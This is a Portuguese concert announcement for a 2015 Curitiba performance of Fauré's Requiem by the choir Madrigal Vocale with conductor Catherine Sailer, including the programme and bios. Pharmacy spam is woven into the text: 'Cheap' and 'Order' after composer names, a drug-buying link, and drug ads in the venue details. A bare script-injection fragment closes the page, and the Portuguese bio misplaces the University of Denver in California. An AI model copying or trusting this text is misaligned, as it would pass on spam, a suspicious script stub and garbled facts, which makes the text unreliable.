Música sinfônicaParanáProgramação

“Requiem”, de Fauré, com o Madrigal Vocale

Madrigal Vocale canta com Catherine Sailer.

 

Nesta sexta-feira, dia 6 de fevereiro, um concerto especial atrairá a atenção do público não apenas da música clássica ou coral, mas também da música sacra, pois uma das peças mais expressivas do repertório religioso será interpretada na íntegra, na sua versão para coro, solistas e órgão.

Trata-se do Requiem, de Gabriel Fauré, uma das mais aclamadas obras do gênero pela sua delicadeza, expressividade e, principalmente por diferir de outras obras famosas com o mesmo tema, como o réquiem de Mozart, por exemplo, por – tratando-se de uma missa dos mortos  – mostrar não a desesperança ou o medo do fogo do inferno, mas sim a placidez, a esperança, as cores belas do paraíso. Poucos coros conseguem atingir esse estado de espírito na interpretação.

Completando o programa serão apresentadas 3 peças da renascença, de Palestrina, Byrd e Victoria, e dois lindos negro spirituals.  O Madrigal Vocale, coro fundado nos anos 60 pelo saudoso compositor e regente Pe. Penalva, recebe para esta récita uma regente dos Estados Unidos, Catherine Sailer, doutora em música e atuante em diversas instituições do mais alto nível na América.

Os solistas serão Bruno Spadoni (barítono) e Ana Luísa Spadoni (soprano).  Clenice Ortigara estará ao órgão da Igreja Bom Jesus, na praça Rui Barbosa.

PROGRAMA

John Sheppard  (1515-1558)
Haec Dies

Tomas Luis da Victoria – (1548-1611)
O Magnum Mysterium

Giovanni Pierluigi da Palestrina Cheap – (1525–1594)
Exsultate Deo

Gabriel Fauré – (1845-1924)
Requiem, em Ré menor, Opus 48

Chico Buarque Order (1944), Vinícius de Moraes (1913-1980), Garoto (1915-1955)
Gente Humilde

William Dawson – (1899–1990)
Soon Ah will be done

Tradicional
Walk together, Children

 

MADRIGAL  VOCALE http://tammam.mhs.narotama.ac.id/2018/02/02/buy-atarax-from-canada/ Cheap

O Madrigal Vocale foi fundado em 1982, com base no Coro da Sociedade Pró-Música de Curitiba, que já existia desde os anos 70,  sob a liderança de José Penalva. Este fabuloso músico desde cedo imprimiu ao grupo uma característica musical específica, que nestes mais de trinta anos de existência, o coro tem procurado manter e aprimorar. É composto atualmente por 20 cantores e regido por Bruno Spadoni. Propõe-se a cultivar todos os gêneros de música camerística, da Idade Média à música contemporânea, incluindo em seu repertório primeiras audições locais de grandes obras do repertório internacional e primeiras audições de compositores paranaenses. Tem dado ênfase ao canto “a capella”, apresentando-se, porém, igualmente junto a instrumentistas, outros grupos vocais e orquestras em diversas capitais e centros culturais do país.

Embora o coro tenha por objetivo executar com igual primor a música coral de todas as épocas, é inegável o pendor pela música contrapontística desde sempre. É nessa fonte que o Pe. Penalva foi buscar certos traços que definem as execuções do grupo: o cuidado na execução de cada uma das linhas melódicas, a busca da música por trás (e para além) das notas. Esse pendor explica o sucesso de certas exibições do coro, como, por exemplo, a apresentação em 1987, em São Paulo, no ano de 1987, da Missa Papae Marcelli, de Palestrina. É o mesmo princípio que guia também a execução da música barroca, dando ensejo,  em 1988, a uma apresentação em parceria com a Orquestra de Câmara de Blumenau do Messiah, de Händel.

Igualmente estão guiadas pelo mesmo princípio a execução em 1991, com a Orquestra de Câmara de Blumenau, da Missa da Coroação, de Mozart e, no mesmo ano, do Réquiem, de Mozart, com a Orquestra de Câmara de Curitiba, sob a regência de Lutero Rodrigues.

E essa busca pela relativa independência das vozes que nasce da interpretação de obras da renascença aparece também na execução do repertório nacional. Em sua história recente, o Madrigal Vocale tem se dedicado a mostrar o trabalho de compositores paranaenses como Henrique de Curitiba, apresentando sua obra coral em março de 2010 na Capela Santa Maria. A música de compositores brasileiros habita desde sempre os repertórios do Madrigal.  O programa foi apresentado na tournée do SESC Paraná – Música de Câmara, tanto de 2010 em Maringá e Jacarezinho, quanto na de 2011 por Toledo e Cascavel, além da turnê com o octeto formado por integrantes do Madrigal Vocale para o projeto do SESC Nacional, Sonora Brasil, com a realização de 39 cidades das diversas regiões do Brasil.

Nessa mesma pauta, em junho de 2011, juntamente com a Camerata Antiqua de Curitiba, apresentou na Capela Santa Maria a Missa Afro-brasileira, de Carlos Alberto Pinto Fonseca, sob a regência da maestrina Ângela Pinto Coelho. Também em 2011, o Madrigal Vocale marcou presença no Festival Penalva, apresentando-se tanto na missa em memória do Pe. José de Almeida Penalva, realizada na Igreja do Imaculado Coração de Maria, com obras como Surrexit Dominus (uma obra do Pe. José Maurício Nunes Garcia) e Aleluia (uma composição do Pe. Penalva), quanto no encerramento do Festival quando, juntamente com a orquesta da PUC/PR, sob regência de Bruno Spadoni, apresentou, no auditório do Canal da Música, uma das obras mais grandiosas de autoria do Pe. Penalva: Os Quatro Cavaleiros do Apocalipse.

É preciso frisar, no entanto, que a inserção do Madrigal Vocale no panorama cultural brasileiro vem de longa data. Por exemplo, em 2004 apresentou-se no Festival de Música de Londrina e, em 2005, apresentou série de concertos natalinos com o soprano Marília Vargas (trecho dos quais está disponível no site de vídeos www.youtube.com). Em 2008, apresentou-se no Festival de Música de Londrina e, sob a regência de Norton Morozovicz, no Concerto Natalino da Universidade Positivo. Mas antes, já em 2002, foi selecionado pelo Projeto Sonora Brasil do Sesc Nacional, para excursionar por 39 cidades do Brasil, desde Santa Catarina até o Acre e Amapá, passando pelo DF e pelo Ceará, num total de 44 concertos. Dessa excursão resultou um programa de TV e um DVD, apresentado pela Rede Sesc de TV.

Mas o registro de sua atuação não começou aí. Em 1999, já havia lançado seu primeiro CD, que contemplava Motetos e Madrigais, numa clara alusão à sua filiação renascentista, digamos assim; em 2003, lançou o seu segundo CD, homenageando a obra coral de seu fundador, José Penalva. E, em 2006, lançou seu terceiro CD, com obras do  espanhol Luís Iruarrizaga, mestre que José Penalva admirava e que é pouquíssimo conhecido fora de sua região no país basco, tratando-se possivelmente do primeiro CD dedicado a este compositor.

Nestes últimos anos, o Madrigal Vocale tem produzido uma série de concertos independentes e se dedicado a divulgar e promover a obra de seu fundador, bem como de manter seus princípios fundamentais. Destacamos a participação no Festival Penalva em todas as suas edições, tendo nesta última edição de 2014,  realizado a estreia mundial do Requien do compositor e músico paranaense Helio Brandão.
O Madrigal Vocale hoje é integrado por 20 cantores.

CATHERINE SAILER

Catherine Sailer, Diretora da cátedra de Estudos Corais na Universidade de Denver, Califórnia, rege atualmente o Lamont Chorale, o Lamont Women’s Chorus e o Evans Chorus. Vencedora do American Choral Directors Association Conducting Competition, tem atuado como regente de coros ligados a diversas orquestras americanas como a de Dallas, New York Philharmonic e trabalhado com artistas da altura de Stephen Alltop, Tan Dun, Marin Alsop, William Warfield, Marilyn Horne, etc.

Catherine Sailer, Director of Choral Studies at the University of Denver, conducts the Lamont Chorale, Lamont Women’s Chorus and the Evans Choir. She is also the Associate Conductor of the Colorado Ballet Orchestra. She was named the winner of the Robert Shaw Fellowship in 2005, chosen by Chorus America and supported by Warner Brothers and the National Endowment for the Arts. Sailer won first place at the American Choral Directors Association Conducting Competition.

Catherine Sailer has collaborated as conductor or chorus master with singers William Warfield, Marilyn Horne and Josh Groban, and conductors Bramwell Tovey, Ed Spanjaard, Eric Whitacre, Victor Yampolsky, Marius Szmolij, Stephen Alltop, David Amram, Tan Dun, David Fanshawe and Marin Alsop, and prepared choruses for performances with the Dallas Symphony Orchestra, New York Philharmonic, Colorado Symphony Orchestra and Cheyenne Symphony Orchestra. Other conducting Credits include the Atlanta Symphony Chorus and Orchestra, the Northeastern Pennsylvania Philharmonic, Santa Fe Symphony Orchestra, Beijing Symphony Orchestra, the National Opera of China, the Cabrillo Festival of Contemporary Music Orchestra and Central City Opera. Sailer has been a conducting fellow with the Dale Warland Singers, the Kansas City Chorale, the Chicago Symphony Chorus, the Carnegie Hall Workshop Chorus and the Orchestra of St. Luke’s.

Catherine Sailer received the doctor of music with honors in conducting from Northwestern University and the bachelor and master of music degrees in piano performance and conducting from the University of Denver. Further studies were with Helmuth Rilling at the Oregon Bach Festival and Leonard Slatkin at the National Conducting Institute with the National Symphony Orchestra. Prior appointments have been as Music Director of The Musica Sacra Chamber Orchestra, and Associate Conductor of the Cheyenne Symphony Orchestra and the Denver Young Artists Orchestra. She is an active guest and festival conductor for choir and orchestra and her collegiate ensembles have appeared at Colorado Music Educator’s Association and Southwest divisional conferences of the American Choral Directors Association. Sailer also gives conducting masterclasses for the Sing a Mile High Choir Festival and has presented sessions for CMEA and ACDA. She is currently the state chair for Collegiate Repertoire and Standards for ACDA, and was selected by ACDA to represent the Southwest division on the International Choral Exchange Program to Shanghai, China.

SERVIÇO
 

Paróquia Bom Jesus dos Perdões Order
Purchase cheap mestinon side Praça Rui Barbosa, 149 – Curitiba

Concerto 6 de fevereiro de 2015 às 20h.

Contribuição espontânea: R$15,00

cheap hydrochlorothoazide Informações: Paideia – Escola de Música
www.paideiamusical.com.br
Tel: 41 3252 5293

Madrigal Vocale canta Luís Iruarrizaga

d.getElementsByTagName(‘head’)[0].appendChild(s);